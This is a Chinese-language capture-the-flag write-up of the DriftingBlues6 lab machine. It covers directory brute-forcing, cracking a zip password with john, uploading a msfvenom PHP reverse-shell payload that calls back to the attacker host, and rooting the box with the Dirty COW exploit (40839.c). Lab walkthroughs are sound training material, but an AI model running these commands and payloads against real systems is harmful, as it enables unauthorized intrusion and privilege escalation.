driftingblues6：

Download：driftingblues6

Found

先使用arp-scan进行主机发现

在VMware上查看靶机的mac地址

arp-scan 172.16.10.0/24

根据arp-scan的扫描结果，判断靶机ip为172.16.10.149

Collect

找到主机IP后就可以对其进行信息收集。

使用nmap进行端口扫描

发现有80端口的开放，先使用dirb进行对网站的目录文件扫描

进行对可疑文件和目录的访问查看

在robots.txt文件中查看到/textpattern/textpattern和一句提示，大致是说别忘了还有zip文件

这里登录需要使用用户名和密码，先要进行信息收集

使用dirb工具对zip文件的扫描

dirb http://172.16.10.149 -X .zip

发现是没有扫到文件的，可能是扫描的字典文件太小，再回去看robots.txt文件中的提示，说是要添加到dir-brute

使用kali自带的工具dirbuster再次进行扫描，并且字典文件选一个中等的文件进行尝试

查看扫描结果有spammer.zip文件

访问后进行下载

进行解压查看，发现需要输入密码

得到网站后台用户密码

使用zip2john将zip文件的密码信息进行提取

再使用john进行解密

得到密码为myspace4

使用unzip进行解压后得到creds.txt文件

得到一组用户名和密码，回到登录页面进行登录

上传反弹shell

登录后查看到可以进行上传文件

先在kali中使用msfvemon工具进行生成反弹木马

msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.185 lport=1122 -f raw -o 1.php

将生成的文件进行上传

上传成功

在kali中打开监听模块进行监听，并修改好payload和监听ip、端口

根据页面上的提示，可以猜测到访问的路径应该为

http://172.16.10.149/textpattern/files

尝试进行访问

查看到刚才上传的1.php文件

先到kali中开始监听，然后对文件进行访问

得到一个shell

Upgrade permissions

进入后查看当前权限

python -c 'import pty;pty.spawn("/bin/bash")'

打开交互式

查看当前系统版本号

可以使用脏牛漏洞进行提权

*漏洞范围*：Linux内核 >= 2.6.22（2007年发行，到2016年10月18日才修复）

使用searchsploit进行对脚本(40839.c)的查找

searchsploit -m 40839.c #将文件下载到当前目录

在攻击机中开启http服务，靶机中进行下载

靶机先切换到tmp这个目录，是一个存放临时文件的目录，一般会有权限进行下载

使用gcc进行编译

gcc -pthread 40839.c -o dirty -lcrypt

执行时直接在后面跟上用户的密码

su firefart #切换用户

提权成功，得到flag

END

涉及到的就是zip文件密码的破解，web的文件上传，还有脏牛提权，整体来说还行，继续加油。